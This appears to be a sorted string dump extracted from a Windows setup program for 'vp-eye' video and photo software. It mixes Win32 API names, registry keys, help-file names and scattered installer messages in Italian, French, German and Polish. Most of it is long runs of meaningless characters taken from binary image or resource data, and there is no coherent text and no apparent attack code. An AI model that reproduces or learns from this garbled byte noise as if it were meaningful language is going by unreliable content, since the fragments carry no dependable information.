rrrQQQ
r`}r]vr_xm\wj\xd]x^WrcXriXsiVoi[wkZ{nYylYnfWeupy
rs{mnzmkxlhxmiulhtniutp
r[s^ObOG\J?_L?\KB
rSxeDvaF9
rSydDxbF9
[_rSYlVZmVZmUWiYZnXYmABW8:R`d}af
r systemu operacyjnego
RtlIoU
RtlUnwind
RTqIKlADg?Ab;=iABoGH_86U/+S+&W/*d:5\0)P'
RTrJLlADf>@c;=iABnGE_86U/+T,'X0+d:3Z0)Q' U+$Y/(]3,U.&X1)a:2V/'T-%V-$Z/&U+
}rtsefl][j[Xveb{li|plynjvkgtjckc\f_Vsmb
\RtTIjM>]E9S@;Q;0L:3F6/;0(>3/61.2-*+*&'($1,#*%
RtzMpzJnxDkt2Ya<ck=gn8`e8^c/UZ*PT)RU0V[=]c\u
R|uB1$O3,`C5yWG
R;uJ5zB/
r`U}jb
RUjHK`EH]BEZ<=Q?>R=;Q67L@CX\`y\azV]xXc~Q]yRc~Mb}Pe
RUjHK`FI^BEZ<=Q=>R=;Q67L@CX\`y\azV]xWb}Q]yRc~Mb}Pe
RULB/(F1)Q7)^A2sM;
RULC:-C4+F:0ZH=bOBmL=xN;
RULM3-K5*P8,U;/Z@4dF;nPEz]O
RU]MPXLR]MS^QV_UX`UW_QS[PS[LT[LX^O_eMQ\?FO6@G1;B0<B1=C3=D/;A-9?-9?.:>.:>/;?0<@3?C.:>-:<,9;-:<-:</;?/<>0<>2>@,8:-69/8;29<29</8;07:18;/8;1993:=18;1;;0;93;:4<;1990::5??:LSOu
RunStatus
runtime error 
Runtime Error!
R:uO7wI7
~}rusKROt
rusv{yx~}mtqM^[
ru~uxpkmqhe
rU~|Z{
R[vGM`EJ_HOcDL]?IP;EE9@C8<A59:378/69cip
R[vGM`EJ_HOcDL]?IP;EE9@C8<A59:378/69ein
RV[ilt^ai(+0&$**)-&&,,(-/).+&(/--;99IIIAAA
r[v_PcNF
RVr7A_&4P&3M'3K)5M$2I*4L.;U.=W2?Y2>V.8P2=X7D^5@[7B^2<Z2=[5C`9IfHUuFQq@LnMV{OX~V]
RVr7B^(4P'4N'3K'5L"1K*4L/:U.=W2?Y2>V.8P2=X6C]6A\7B^2<Z2=[5C`9IfIWtGRr@LnMV{PW~V]
rvrcgo`dxbg|_bwWXwWXy__tXXt\^m]dcXbdYibZef]gk^foagwbdwWXyZ]tV[zQVqNRjPViV_eT]gZbk[bhZ[gWQdLFbD?_FB]D@X96K20N51XCB_ML`OL_ML\GE]IDaIIiJMmNQgLOhEIgLPdRY_T^YT]^V``XcgXfoT^sNPoHFiID[4,\*
rvsdho`dxbgz_cwWXwWXy__rXXu]_l\cbWaeZjbZef]gj]eoaewbdwWXz[^rW[zQVqNRjPViV_eT]gZbk[bhZ[eVScKEcE@_FB]D@Y:7K2.O64XCB_ML`OL^LK\GE]IDaIIiJMlMPgLOhEIgKQdQZ_T^YT]^V``XcgXfpU_sNPoHFkHDZ3*\*
\RvSIjM>]E9S@;Q;0K92F6/:1(>3/62-2.)+*&()%0+"*%
rvwprsty|v}
R+#W;0bMEwd_~rn
\rwNdbQb^[c\RPEF?0t\H
Rw]Ty_Qx^Ow^Is\EnYGkZJiZEeTCeTCdU=_T<^S;_O?aP?aP<]N<[L5TE.O@%:1(-+nac
Rw]Ty_Qx^Ow^Jt]EnYHl[JiZEdUCeTCdU=_T=`R;_O?aP?aP;]L<\K3TE0O@%:1(-+lac
RW!U[/be8ei=agQqv
rw|USuKD|KCyICmGGrWZ
RWvW[wZ]y[_xY^wY^wX\xX_xV]xT]xMXt3Bp
RWvW[xY\xZ_xY^wX]vX\xX_xV]xT]xMXt3Bp
R^X>1#C/$C80F;3SB9^KCqWP}g[
rx}]dggmrpuxz
RX{HNqLRwV\
#R&-X"'N
#R&-X#(O
_^r``x^\redx`_sZ^q[at^dwip
_^r``x_]sedx`_sZ^q[at^dwip
R_yFUoJXtTe
_ryJ]e>S[>X_C`eJgn+MS(LT;bk@gp5_k/Vd+Oa+Ra(O]-P]3S^2NY1IU0GV6M\4Sb8Xe8Xc8Xc7Wb6Zb3X`/V^Fen@dl2V^o
_ryK^f>S[@W_B_dJgn*LR)MU;bk@gp5_k/Vd+Oa-Qa+P^-P]3S^2NY1IU0GV6M\4Sb8Xe8Xc8Yb6Yc7Zd3X`2W_Fen@dl2V^o
`ry[nuk~
RYz@Ki6@^<A`LMibYnyo
RYzV\yX\xW^wX]vVZvX`wX^uX\xU^yGSo(;h"5r(6j$"8#
rZBt]Cx`DwaEydH{fJ{b@zb>za?|cCx`B~cA|cC~b?x_=}aCzdAw`@{bBy`>{bBxaAzdH
rZBx`D
R;zG3rD3
rz grup
_rzH]e5NX+EQ?^gDdo
_rzH]e5NX+EQ?^gEfo
R\z>Ig.9Y*5U1<\1>^6Cc5Bb3@`:Gg7Dd:Ec8Ca-8V3=_AJoRY
R\z?Jh.9Y*5U1<\3>^5Bb4Aa5@`<Gg:Ec:Ec8Cc-8X3=_BKpRY
RZx>Gh<Fh>JlCQnDOm:B_.3L'*?
RZYJOPglj
RZZJOPglk
s:!~>%
s:!}=$
(S"0`(9j0At7L
S:0dLFy\U
S:0X4*i>5|NC
S1[1`1m1
S=1SB/dL:{_T
S@1WB-jL9
,S!2]$4b 1\"4]#6\
S2\4(tTY
S2]5)tTY
S2`6*wVZ
S2"a7*b9*^6$_4#e9(b3%h9+k?.mA4lA2oB4j;-h:)pB1wF6zG7G
S2"a7*b9*^6$_4#e9(b3%h9+k?.mA4lA2oB4j;-h:)pB1wF6zG7I
S2}F'v:
S2}F'w;
*S@3aL=w[J
@S@3`K<w[J
.S 3T"5V"4S%5R/=YJYsm{
S3`;-vZY
S3_:,vZY
S3W7,qVZ
S4sL0iG0^=-T9/L3)F/'C/*?0.:,09.6>5?;2<;6?;7B=;GB=LIBOMGRNJURNZUQ][Wc^Ze]Yd]\f`_ic_jgdmkhqlhnqjqrjqaVYcQRsYY
S4W7,pUX
,S$8[%9\(<_';^)<],=^-?^,<Y0;Y1=Y0>[8Fc=Kh@LhHUoKWoGSkM]tZh~Vdwao
-S"8\);`-@c*:W#3J$3F*:K(6H,8J.:L.;K-:J;FT@KY>IWHSaXcqVcqZduak}cm
S`^8DD2?A0?B3?E0BI9FNaou
S`^8DF1>@0?B3?E0BI9FNbpv
S8sJ1lD+]8"U7&Y?/]J=aUK0'#
S8sJ1lD+]8"U7&Z@0]J=aUK0'#
S95a=9
|S]]-9;*68>IMfsuv
}S]]-9;*68=JLfsuu
-S#9]);`,?b)9V"2I$2H*9L(6H,8J/;M/<L-:J<GU@KY>IWITbXcqWbpZesck|cm
S9-dHA
S]{9Gd.;[(5U,9Y/<\4B_6Da/=Z0=]5Bb:Ec:Ec0;Y-6W=GiFMtQV}eh
Sa~ANn;Ml@Rq>SoASp7Ea+7O%/A
Sa~AOl=Ll?Qp>Sn?To7Ea+7O$-A
sa{dTr[KfSD_M<\KB_O>lWHx^N
SagGVY
sa`jYVgTQgTQhSQmZUn[VkYRhXQhXRhWNeVM
Sa]]kgn}y{
Sa]^lhn}yz
SamFU^MZb
SaQKrb[
SatF}bG~eG}fBwc?t`;o]6gW.aS*]O$YK$XG!UD&VD%RA"QA!OB
SatF}bG~eG}fBxa>s_=o]5fV/`R*]O'ZL$XG$UE&VD%RB$PC!OC
SatF}dG~eG}fBxa>s_=o]5fV/`R*]O'ZL$XG$UE&VD%RB$PC!OC
SatG~eG}fBxa>s_=o]5fV/`R*]O'ZL$XG$XG$UE&VD%RB$PC!OC
SaVNr_W
saZWB3fL>nQB~\L
{~^S[B4?TISxp{>5B*",c]btpv3+5(
^S[B4?UJTwoz>5B)!+d]bvov3+5'
&;;SBD\\`yaf
sb_jYVgTQgTQgTQmZUn\UkYRhXQhXRhWNeUN
S\~BNp~
SBoOBnWUlacqpt
SBoOBnWUlacrqu
SB!TF!NE ?@
SB!TF"OF ?@
sb}t_xt^vx^uu\pp]pnbvl`veYod[ulZyoWzlVrjVcxai{jn
sb}t_xt^vx^uu\pq^qnbvl`veYocZtlZynVykUqjVcxaizim
Sb|VcyP\n<FX(/B!%8&+:%*9',;/1C+,@%'?
sbYjRFoRC~ZJ
SByQ?sO=
SBzR@rN<
SC7P6/S8.\C9hOEjWOx_U
Scegliere l'elenco
SC}G6z?,}B/
sc~gXsZJhR@eQ?gUDeVFf^QOIB%
sc~gXsZJhR@fR@gUDeVFe\ROIB%
{schedsvc
SC~K;q=0f2%h4'zE8
SC~K;q>.f3#h4'zE8
S_cl{~
S_cM\_`lpmy{x
scufSf
Sd~L]wJ]rBTkSb|m}
Sd~L]wL\sDTkSb|l|
SDPSRV
SD;Q:2V>2V:/Y<._?2iF9sPC
s]Dx`D
SdyM^qXgzap
Sd)Zh4`q1S` CM
{SdZS~rh
=Se-CO:PV
section:%s  key:%s  in %s  file error
@?SEE][_xdh
SE]K?SO>K>'+*
SelectDriver
SelectObject
Selezione sistema operativo 
S[[EMMU[Z
Se|M^sbq
SendDlgItemMessageA
SendMessageA
<se*ra(ti/qa,se0
serial_binary
SerialKey
serial_number
SerialNumber
Serial Number
serial_number_key
SERVERNT
SetBkMode
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEnvironmentVariableA
SetFilePointer
SetFileTime
SetHandleCount
SetRect
Settare Menu
settings
.\setupc.hlp
\setupc.hlp
.\setupf.hlp
\setupf.hlp
.\setupg.hlp
\setupg.hlp
.\setup.hlp
\setup.hlp
.\setupi.hlp
\setupi.hlp
.\setup.ini
setup.ini
.\setupj.hlp
\setupj.hlp
.\setupk.hlp
\setupk.hlp
\setup_language.ini
.\setupl.hlp
\setupl.hlp
.\setupp.hlp
\setupp.hlp
.\setups.hlp
\setups.hlp
setup_text_string
.\setupt.hlp
\setupt.hlp
SetWindowPos
SetWindowTextA
SE~UF{L>yK:
{SeYUzkb
sf~f`{d\{_X
sf~f`zc[{^Y
@?SFG\\`ybi
SF\K?SN=J>'+)
Sfogliare
Sfogliare CD
sf|_O`M>LJ<HhZfWGRQBJ3$,4&,8(/6'+3%'0"$5(*?47>3;4(4:.D?3O?3W<1W3&F.
Sf{Xc~Wc{S]oQWbOU`NYaPZaLS\GMXENW?JR9DL=HP@KS>KSALT7@I=HP1>F5AG5?F4@F3?E/;A3?E6BH/;A0<@/<>1=?-9;1:=1:=1:=2;>3<?/;=27:/991982<<5>A7@D>QXTy
Sf{Xd|Wc{S]oQWbOU`NZ`PZaLS\GMXENW?JR9DL=HP@KS>KSALT7AH=IO1?E5AG5?F5AG3?E/;A3?E5AG/;?0<@/;?0<>,8:09<1:=1:=2;>3<?0<>1690881982<<5>A6?C>QXUz
SFzLAyA6rE8sE>sJAqMEqMGqKFqMEuPHuNFyKDvL?~M=
sg}ma}k`
sg{_O`M>LJ;IgYeVFQQBJ3$,4&,8)-6'+3$(0"$5(*?47>3;4(4;/E?3O@4X=2X3&F.
:Sg&=S*;NScp[gsIXhJXkO_oN^oN\rM[qTbxR`vSbuVexTcvXhxO\jao{
:Sg&=S*;NScp[gsKXhJXkN^nN^oN\rM[qUcyR`vSawUdwSbuUhwO\jco{
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
_s~H\gAVe#;G@Zf6R]C]kJes-GSGcj7T],IN=W]D\b5KQ>QX
_s~H\gCVe$<H@Zf6R]B\jJes-ITGcj8T[.HN=W]D\b5KQ>QX
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI.dll
ShowReadMeFlag
ShowWindow
(SHP|qtF8<2$*cS^seq7'23%+obdmci2'/8*+
Sh}Sh~Xj
shtWHw[J
shzgZkYNgTLn\Uzjc{phme^*&!
shzgZmYNfSKn\Uzjc|qime^*&!
 si deve attivare questo programma con almeno 256 colori 
SING error
]SIRA8UC<S@8ZB6eRJnTHxXK
size%d
sj+~u;
SKDF6*L:3Q84R<6V<6[KDj[Rs^V
S>kT6w]N-
}S@=k[U
sk.~w>
S^l!&5
S=~L6yD/}D.~B*
{S^LAs]Q
{S[LCr^S
sl{ibwkexhgwjj|feuaaqcewik}gk}dixehwbcqX\njn
sl{jcxkexkhxlj}feuaaqcfuil{gl{dixehwccsX\oko
sl|kbqbYgXOh[Spe]
sl|kbsbYgXOgZRpe]
SL{MFjCAkIJH.42 -5%71$:,
SlvL`kUhp9MXDYaOdl_ryn
SlvL`kUhp9MXEZbOdl_sxn
slyqjw|q{
[S{MBxD7sH9kI<eKDbE@YC8XB7]D:bH:kG7k@+lA.qK?wQEmD5rUFnYQhTIdWOfTMfSLhUMlWOp]Nx^MyI7yB5yLApM@gYGR
[S{MBxD7sH9kI<eKDbE@YC8XB7]D:bH:kG7k@+lA.qK?wQEmD5rUFnYQhTIdWOfTMfSLhUMlWOp]Nx^MyO<xG9yKCuD<v8.t@3kG=oLIjOKiLHgOIpVOsZPwZLtU@wM6{P;{UCxR@oC2j@3dA7iG:pO@rQAnRAqSBpO?oH:sF;uH=zG={RIyH>u:0wB8lG?kICeIB\F;[A;[F>gJAqE>vA7u>1{J<}XJvD2u7%s7't;&m6!n;'rA3xD=vMJy[VvULoOIkMLkMLmRUqXTnRRqUTwWXsQQsOO{ONyQL~[WyVSwF>wKDsQQuUZnW_eU`bRYjVbm\gs\dw\`yTX
[S{MBxD7sH9kI<eKDbE@YC8XB7]D:bH:kG7k@+lA.qK?wQEmD5rUFnYQhTIdWOfTMfSLhUMlWOp]Nx^MzP=xF:wLCtC;v8.t@3kG=lKH
[S{MByE8tI:kI<eKDcFAYC8XB7^E;bH:kG7k@+lA.qK?wQEmD5pVFnYQgSHcVNfSNgTMhUMlXMp]Nx_KzP=xF:wLCtC;v9/t@3kG=mLI
s^mjWfZM]KARF<LC9ED<CI<DC;B@8?F8CD7E>6A929@8BC8@B14=-4>-1?/6NCKMELA?E@CHBAJEALHBMJ<GLAIK9FM9FK:CM=DQ@DRAJPCQL;IH6GL>PLCWNEYOGXRES]KXiVeldu]M_YPd{o
%s\mmvem.exe
%s\mmvem.exe %%1
smqc]p_Vo_Swe^
SmtOioZns[nqo~
smvd]xf[vc\
smvZSrVK
smw[TrVK
smx[TvVK
S]n!&5
?S#Na!Se%Zn0ey1fz/ev2ix1hw1eu2eu0aqL
{~snokfeqii
~SnP?UJF
sn|qmzok
S,$N(#T.)U1+S/)O*&L)%T1-V3/Y63Z74L&$N)%N*$M'"S1+Z73^;8^<<gEEvPN
SOFTWARE\Mi
software_version
Software\vp-eye
Software\VP-EYE
Software\vp-eye\browser
Software\vp-eye\Photo Magic
Software\vp-eye\video game
Software\vp-eye\video player
Software\vp-eye\video Recoder
sO`kabkafjdjmdyoeukazndtj`jh^ni``f[]cXX`UYaV[aVWbXT[VCQPRVWSWXRXWPXXNWZKZVMYY]baS[[R][Z\VUXO\]Slf[ccUohYpiZsj]rjctmd}nk
sO`kabkagkeilcyoeukazndukajh^ni``f[^dYX`UYaV[aVWbXT[VCQPRVWSWXRXWPXXNWZKZVNZZ]baT\\R][[]WUXO[\Rlf[ccUngXpiZsj]rjcslc}nk
%s open for read error 
%s open for write error 
Sortir
sou/!#N$
sou/!#P$
sousou/!#N$
SPA8\J?pYJ
spazio disco libero
Spazio su disco insufficiente .
[SpB;Q,$4
spdQJgNDqWIvLE
Speicherplatz ist nicht genug f
Sp`FFF
SPfNU^=MS,G\&Bq4Hx26N& 
SP}LN}JN
 , spo
`SpO@uRE|YL
*SPYyx~
sqfMIhKGjMIdEB_@=bD?eHCY@<Z=8eF=iGAjD?vE7
sQNe`NeaNc`WecVd^X`Y\d]\e[Ud\Sd[M`WSf]Rd]E\TG^VCXPDSOCOO=MLBRQ>SQAST@US>RSBVWHWZM`eD]aO`cK[ZGUQR^XP`YVb\_jgXfdWedckjbfginllomyysrokvwn{{u
sQNe`NeaNc`WecVd^YaZ\d]\e[Ud\Te\NaXSf]Rd]E\TF^VCXPARNDPP=MLBRQ=RP@RS@US?STBVWIX[NafE^bO`cK[ZGUQS_YP`YUc]_jgWheYeeflkaefinllomyysqnjuvm}zu
SQPGB?oid
 sq!pm"yv,
|{sqqoqq
|{sqqprr
squhfk^\l_]nb`nc_ofblfanje
squigk^\k_]ocalc_mgblfanje
SQ{WS}TPyVR{VU}VV~MRyGMvGPvHOvJRwRU{SWzPVyMT{RX
SQ{WS}TPyWS}VU}VV~MRyGMvHNwHOvJQxRU{SWzPVyNU|SY
sQZLFwg`
S[r%)<
sR;af5dh6ei5fh:fg7ef8dc6ec6de8cf6bc3[Y.PO,MP)IO&HN'IO(HN)DH*AC)CC*DD)CC(FG'II'KK-PS.OR*PU.S[+KP.DI,?D4CF2?A6DC9GF8FE7CC5AA<HHHTTAKKJSVHTVKWYIUU]hfWb`\eb^gddkfkrmhnikoi|
sR;af5dh6ei6fh8fg7ef8dc8dc6de8de7cb3[Y/QP,MP)IO%GM'IO(HN)DH*AC+CC-EE)CC(FG'II'JM,OR.OR*PT.S[+KP.DI.>D4CF2?A6DC:HG8FE7CC5AA<HHGSSAKKKTWHTVKWWKUU\geWb`\ebahedkhkrmhnikoi|
SR|PO|PO|POxOMuKLtJKsIJqGHjCAg@>b<:^86\53X20T..R,,Q)*O'(R'*Q)+R*,W/0X01]34a78i@>pHJ|TU
SR|QN~SP
SR}RO|QN|POxOMuKLsIJsIJqGHkDBg@>c<:_86\53Z31U-.S+,Q)*O'(S(+S(+R*,V./Y12^45a78i?@qIK|TU
SR{RO|RM
%s: %s
%s   [%s bytes]
SSI Company Profile
%s\%s.lnk
ss}qo{omznlwlhzokynj{omwnksnm{wv
ss~rp{plznlwlhynjxmi{omvmjsnm{wv
%s\%s\%s
}sssefl][j[Xsdazkh|plynjvkgtjcmc\h_Vsmb
%s\%s\%s.lnk
%s\%s\%s\%s
SS@SSPVSS
>"_s\`sZbu\cs\cnT_fKZaLUUCIM:IN?IN?ISCGQAGSAGZID[LCZLJ]LP`NO_MHTBDG7:5&7-#O=<jUX
startmenu
Start Menu (add control panel to Start Menu)
startmenufile
S^ Ta Va
STb0=-0A 4@$5B"3B&0A&5A-@I<f`Y
STb0=-0A 4@$5B"3B&0B%5A-@I<f`Y
 sterownik urz
s\`tfgugh
s\`tfgvhi
{S_TL}ph
s`~t\xuYox]f
STzRTrRVnSXqRVrTYrW[wV[tP[q?Ol(?l#6s-4e%"1#
STzRTrRVnSXqRVrUYrWZvW[tP[q?Ol(?l"5r/4e%"1#
SU}07^,5`2<l5?n4Am4Ao1>r7Aq8Dt9Eu<Ew;Cx;Fz@J
S$U5:Q29L28L1:K09F-7C.7I.7F.6F/4F/4I27J15N37T6;Y9>X9<b?CkEKrLRvSWzY]
SU}MRyLQxCKpIRwIRtMUzJS~GT
SuperButton
SU|POzTP
Survoler le disque compact
suuhlmglodkn]dgox|
suu]_s^`
suv[^t^`
SUVWh@
SUVWjdP
\SUVWjxh`GA
SUVWPh
SUx9;c,2]*1b,7i+6h$0`(5c/9h/;k.:j0:j19h27h38i39h05f/6g1;k5<n8>s8@uHQ
SUx9;c,2]*2a.7i*5g$0`(4d.8g/;k/;k/9i18i16g38i27h/4e/6g3:l5<n8?q8@uGO
SUxEHgNSr59\)+J
s_/UYY
sV1Ye'Ye)[g,_i2]l0[j.Xe*Wb(Va+Xc,W`-RZ*NT(LR)LP'LP(MQ'MR(MQ(IL'FI%FI(KO%IQ$GQ&FS&CR'AQ*AP*BN&9>'46(46(44(22-54(46'35)25+77,88.<;0=?9FH9FH:HG9GF5BD=JL<IK=JL:GI@LLDQSCNRSY^_dekqpkvtjusIZW@MO@IL=EE<C@>D?BFAEFBKIHJKIGGGDFFBDDAAA>>>>>>7779:8394,3..52,2-20(KB5vfU
sV;am4`m3`k3ai4ae1`d1^b0`b/_c/]d,X_(OW(JP'IO'IO%IO'KQ'LP)JM&DE(C@(DD(GF(GH)HK)IN+OU+PX)M])JZ*AI&58)55'42.882;>5AA2>>2?=0=;5B@4@@<HH>JJ?LNGTV<JICOOEQQFRRJTTBLLHQTNXX]hfZddW\]gdf
sV;am4`m3`k3`k4ae1`d/^b/_c/_c/]d,X_+PX(JP'IO'IO%IO&JP'LP)JM&DE&BB(DD(GF'FG)HK)IN*NV+PX)N\)JY'AH%47)76'33-692;>4@@2>>2?=1><4A?3A@<HH>JJ?LNGTV=KJCOOEQQGPSJSVBLLIRUNXX]hfZddW\]gdf
SVe&(3(# J0$
SV[ilt]`h(+0&$*,(-&&,+'-.(-+&(/,.;99JJJAAA
~}svtKROu
SVuLWuJVrITpQYvT\yT]xTa{Sa}\l
SVuMWuLWsITpRZwT]xT]xTa{Sb|\l
SVWPh`
[^sVYnVYnVZmUVjYZnXYn@AV8:R_c|af
`SvYPsZJw\N
`SvYPt[Kv[M
svztxynppjlm^afenrdpr^eh`efY^_S[ZRZYdjikpogml`de^cdZ`_SYXQUVX[_VY]PTYPS[W]dknrlpqZ[_YX\UX\ORWTOQNHIG>AG<?N@DNACF<<I??LFG^VVMAAH:;PDDMAANBBREGMBDK>@F9;L@@NDDG<8L>8UE>PA>G;;KB?RGCKB>L@>QDBRHHRHHQHENB>N?<RC@QB?I=9D:3WE>[HAVA9U>6R<1R<1V<0`D9^A<aE>^D6]D4_G5\D2[B2[A1_E4cB2eD4eI8bF5cB2bA2_B4[;.Y<.dD9eB8b@3fE6jI9gE5jI:mK>lL?qOBxQCoK;eD1kC0rJ8pE0tG2tF.oC+j>'k9"n@(uI2yH2wE.xD-yB-yD/wE/{F1
svztxynppkmn^afenrdpr^eh`efY^_RZYRZYdjikpognk`de^cdZ_`SYXQUVX[_VY]PTYPS[W]dknsmpt[\`YX\UX\ORWUPRMFIG>AG<?N@DNACG==I@=LFG^VVMAAH:;PDDMAANBBREGMBDK>@F9;MAANDDG<8L>8UE>O@=G;;LC@RGCKB>L@>QDBQGGRHHQHEM@>N?<SDAQB?I=9D:3XF?\IBVA9U>6S=2R<1V;1`D9^A<aE>]C7]D4_G5\D2[B2\B2_E4cB2eD4eI8bF5cB2bA2_B4\</Y<.cC8eB8b@3fE6iH8gE5jI:nL?lL?qOBxQCoK;dC0kC0sK9pE0tG2tF.oC+j>'j8!n@(uI2xG1wE.xD-yB-yD/wE/{F1
S:WC1R:$T@/M>5ND:IC6KB8E>5GE;PJ=TC6[I>VO>UM6ZQ6Y[>LYKM[OM[OTbPZ`IZV=YO7YL6G4'L-$_E?nTN{]\y]\
S_'Wc.[h8ep7bk%PY-Yf7bq7cp6ap;gx6cq?jyLw
sw|lrwnt{knr^_cLKOHDIOKPVSUGEEFAB^Y[{vx`[]^Y[pilunqpilohmniknikunqpilMGH832D?>ZUTe\YOHESII[STXSTQMRC?E;:>KHJ[VWZTULGF?;:976D@?FA@E<9<30QHE|qmnc_^SOujf
sw|lrwntyknr^_cLKOHDIPLQVSUGEEFAB^Y[{vx`[]^Y[qjmunqqjmnhmniknikunqpilNHI832E@?[VUe\YOHESII[STXSTQMRC?E<;?KHJ[VWZTULGF?:;977D@?E@?E<9<30QHE}rnnc__TPvle
swmRUeDAmC<yJB}K?
swnTTeDAmC<xJB}K?
swsocknetman1ssdp
s^wt_xp[to\uobzja{j_yj[vlVrgWviY{iSpjRdsbm
swxnrsty|v}
S$X8=U5:Q29L28L1:K09F-7C.7I.7F.6F/4I27J15N37T6;Y9>X9<b?CkEKrLRvSWzY]
S$X8=U5:Q29O39L1:I19E-7D,6I.7G05G05K17J15Q38S5:X8=X9<b?CkEKrLRvSWzY]
sx{fknckklnojllmoowxv
sx{glodlllnnjllmpnwxv
>!Sx^Pv`OvaKq_InZLmXKhQFaQDbODdSDdS=^O=^OC`PC_LC]MC]M@]M6XG0QB*=4&'%_NR
SXY@ED[`a
SXY@ED\`a
S,$Y;0aLDvc^~rn
S>yM6zJ2vH0yM5~O9
s~ymyqjysr
s~ymyqjyts
]S}YOy[Rz^W|[SxTLtMIs@>l88h66d11_31_0,]*$U*
\system32
SYSTEM\CurrentControlSet\Control\ProductOptions
SYxZ_rNTtKSoQ^bQ_XK[WP]bWamV^kPTcHKiTViYZkRVdLT_GOgLVkR\jP]jP]eJShQVhSViVYjVUeNFgKDdJJYHKSBEM<?Q@CU@?P3/M0+`JEs`[eKDbQNXLRYQXXQXSMXRJUTJWZKS_GObLQ]LPbEH_GGdWU\Rb`Zec]hd_hn]arVUeJFhQOeNLT7.F, G-!N4$W9(N4&K.%R1(T.)V0,U/*X3+X%
SYxZ_rNTtKSoQ^cR`XK[WP]bWanW_kPTcHKhSUkYZkRVdMR_GOgLVkR\jP]jP]eJShQViTViWXjVUeNFgKDdJJZILSBEM<?OACT?>P3/L2,`JEs`[fLE`QNXLRYQXWPWSMXQITTJWZKS_GObLQ]LObEH_HFdXT\RbbZec]hd_ho^brVUeJFhQOeNLT7.F, E-!N4$W9(N4&N/&R0*S/)U0,U/*X3+X$
SY|X[zX\yX_zV]vV[tW_vX^uY^wU^yETn(;h 5r'5i$"8"
SZcMR[NPbOYjPYgS[hYZhRR^LP[JOXHQZK^eb}
SZcNS\NPbOYjPYgS[hYZhRR^LP[JOXIR[L_gb}
SZ]EMMU[Z
`S{ZF|O:
S^z:He0;[*5U/:Z/<\4B_6Da2=]1<Z7B`:Ec:Ec1<\-6W=GiGNuQV}eh
SZ{MTuRYzMUzIQvJSuCLm@HmJQxKRyQW
szwhmkinlmrppsqqtrorpmooppppppnqonommnlnnnqonnlkiiigijehlX^e[dm
szwhmkinlnsqpsqqtrorppppppppppooonommnlnompnmmkjiiihjkehlX^e[dm
`SzYE{N9
T+"[0']4+V-$Y2*a:2V.)S,$V-$Z/&U*!Y/#^3*]2)T'
T$0RWV
T<0W<.pIA
-T!2]$5`!2]"4]"5[
T2,[9,wRD
T2%b0$u=,
T2,U5/T4/Q2/U65Y:9^?<]=8O/*M-(S41^?@]@ChIJ
T:3\;2gC;tPFzTH
T3#a7*b9*]5#_4#e9(b3%h9+k?.j@3lA2oB4j;-h:)pB1wG5yF6H
t3*y92u91o6/
T$4QRU
@t}4qv+ih
t4+x91u80xD>
[?@T!#5
(T(5a-=h+:h-:f
'T|<74
T7.^E;z`T
T7(M:-C80)!
T7(N;.C80)!
>/T9/dG@
T9T9$T@/M>5ND:IC6KB8E>5GE;PJ=TC6TC6[I>VO>UM6ZQ6Y[>LYKM[OM[OTbPZ`IZV=YO7YL6G4'L-$_E?nTN{]\y]\
T9WC1T9$T?0M=6MC9IC6KB8E>5HF<PJ=UD7[I>VO>UM6\Q6Y[>LYKM[OL]PTbPZ`IZV=YO7YL6G4'L-$_E?nTN{]\y]\
T9WC1T9$T@/M>5ND:IC6KB8E>5GE;PJ=TC6[I>VO>UM6ZQ6Y[>LYKM[OM[OTbPZ`IZV=YO7YL6G4'L-$_E?nTN{]\y]\
TA2WB-lL9
ta^~kfxe^
ta^~kfyf_
TB7fF9~QC
Tb~BPlQ^xp}
TbdNQG=THBVIA_OCbRKkYNzdX
t{~<BGu~
t{~<BGw}
[\tbipemsdlyjn~rr
Tb~L]xHYtFWrP^zUd~R`vcm
Tb~L]xHYtGXsQ_{Tc}R`vcm
TbnFU^K[b
TB}O=|R?
TB}O=}R?
TBsPBqOBySG
TBsPBqOBySG~`M
TB;VA9dPE
Tc}BPlQ^xp}
Tcekyw
Tcekyx
.tcLCI0
Tc}OaxO]s7BX#*= ':%,?',A.2J
Tc}Q^xS`z_l
t]Ct]Ct]Cs^Cu^Dx`Dx`DwaE{bByaEx_=|dFx^@
TCtI8sK9
Tc}WdzP\n<FX)0C!%8&+:%*9',;,0B)-@$&>
TCwL=~SB
tD8wTJVA9V?7\=4
)/Tdjgu{8HO9LT
tducPao]j[IVM9FYCOYAKkT\_HMT>@U@C]HKN9<B+/O:=T?BXEHL9<5 
TduN^oM\oQ_vN[uR_yO\vR_yVc}R_yVb~Ze
TduO_pN\oP^uN\sR_yO[wQ]yVc}R_yVc}Yd
tdx|p1
'T|E?:
:Te5Mc2J`6Nd4Oc9Th:TeD\n6N`3L\4M]/L[5`oM
:Te5Mc3Ka6Nd6Oc8Sg:TeC[m6N`3L\4N\/L[5`oM
t\^eFCoE>pE<sA5s@0v?0x?0
t\\eFCoE>qF=tB6s@0v?0x>2
(.Tehgu{8HO9LT
tepaX0(!
Terminar
TerminateProcess
text%d
.textVT
}teZRUD;R?7VB7[E:aI=cI;jM>vUE
TF};0~6*
Tf}M^sbq
TF{O>}O>
"TFQwlv0$0'
TGi5)])
"TGOwlv0$0'
thdfWTcTQn]Zs`[q^[kZWeUOiYSm`Xwg`td]pd^
thdfWTfURn]Zs`[o^[kZWgTOkXSo_Xwg`td]oc]
The destination directory for installation
The operating environment selection
t{~>HHr}{
_This #g
!This program cannot be run in DOS mode.
This software is protected by the international treaty.
th|j_t`UmZMn^Rj[Roe[aZQ0,'&#
TH~N<{L>|OB|UF
T-	H@*Q
T_}HSo;FaWb~}
~tiema]k\Yn_\zlf~mj{liuicnb\l^Xk_[f[W
}tiema]l]Zm^[zlf~mj{liwicpb\k]Wm^[f[W
tigter Platz der Diskette:
TIi5)])
ti~j_t`UmZMm]QiZQoe[b[R1-('$ &$#$'%...8::???555444311.,,*((41386695420/+))-(*/*,,&+.(-3/40,2JIMQRV#$(
T?~J3~L5
T]jHQ^JTeNVgY`oy}
tj'|s5
T[|JStMVwFOpFQqLVxKTvGPrJSxJSyQZ
TjsYYJHYMI]OIeQPhYVt^`
TjuRhn
(t:(k8X
